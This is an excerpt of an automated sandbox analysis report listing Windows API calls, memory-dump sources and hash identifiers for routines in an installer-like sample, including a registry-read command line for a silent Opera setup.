                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                                              • String ID: !
                                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                                              • Opcode ID: 1c3a48323f680e00e8acd0968ad6ddb622719981f6bb572e47461f8d3efade9b
                                                                                                                                              • Instruction ID: 9c099894a08b5387b140c0c6ceeae01ce9e162d44e3ef65fd99a7f94bc085c8a
                                                                                                                                              • Opcode Fuzzy Hash: 1c3a48323f680e00e8acd0968ad6ddb622719981f6bb572e47461f8d3efade9b
                                                                                                                                              • Instruction Fuzzy Hash: 00219E71D1421AAEEB05AFA4D94AAFE7BB0EF44304F10453FF501B61D0D7B889418B98
                                                                                                                                              APIs
                                                                                                                                              • IsWindowVisible.USER32(?), ref: 004056CA
                                                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 0040571B
                                                                                                                                                • Part of subcall function 0040466D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040467F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                                                              • Opcode ID: 40cceb3117afc414cce41506be3bec60ebea1126e7aded61cc02dde06f92d8ba
                                                                                                                                              • Instruction ID: 4a72d77d5ba7db911775b8fd6e8698557fa8fe3088d7b3c11d294ca78c68b4d0
                                                                                                                                              • Opcode Fuzzy Hash: 40cceb3117afc414cce41506be3bec60ebea1126e7aded61cc02dde06f92d8ba
                                                                                                                                              • Instruction Fuzzy Hash: 6801B131100708EFDB204F90DDC0A9B3665FB80750F504036F605761D1D77A8C91EE2D
                                                                                                                                              APIs
                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,0043A728,?,00004000,00000000,?,0043A728,?,?,"C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0,?,00000000,004067E1,80000002), ref: 004065B6
                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004065C1
                                                                                                                                              Strings
                                                                                                                                              • "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0, xrefs: 00406577
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmp
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                              • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
                                                                                                                                              • API String ID: 3356406503-1546330588
                                                                                                                                              • Opcode ID: 4117ffae9e6ae2217b5f66a14d7ba68cab57efcdd57ed39205f80f17492d778b
                                                                                                                                              • Instruction ID: 7e3264d492d8171c025e68cf2784a3a6e2d975f6d7be64ef5dd4a0d5c385ab57
                                                                                                                                              • Opcode Fuzzy Hash: 4117ffae9e6ae2217b5f66a14d7ba68cab57efcdd57ed39205f80f17492d778b
                                                                                                                                              • Instruction Fuzzy Hash: E1017C72500209BBDF218F55DC09EDB3BA8EF54364F01403AFE16A2190E378DA64DBA4
                                                                                                                                              APIs
                                                                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406107
                                                                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 0040611F
                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406130
                                                                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,004063DC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406139
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 190613189-0
                                                                                                                                              • Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                                                                                              • Instruction ID: 5f3436636367d0d5bc92f6b0e419d408aad35ecbe6557c54d873c5627a92c34c
                                                                                                                                              • Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
                                                                                                                                              • Instruction Fuzzy Hash: E4F0BB35604414FFC702DFA5DD00D9EBBA8EF46350B2640B9F841FB211D674DE129B99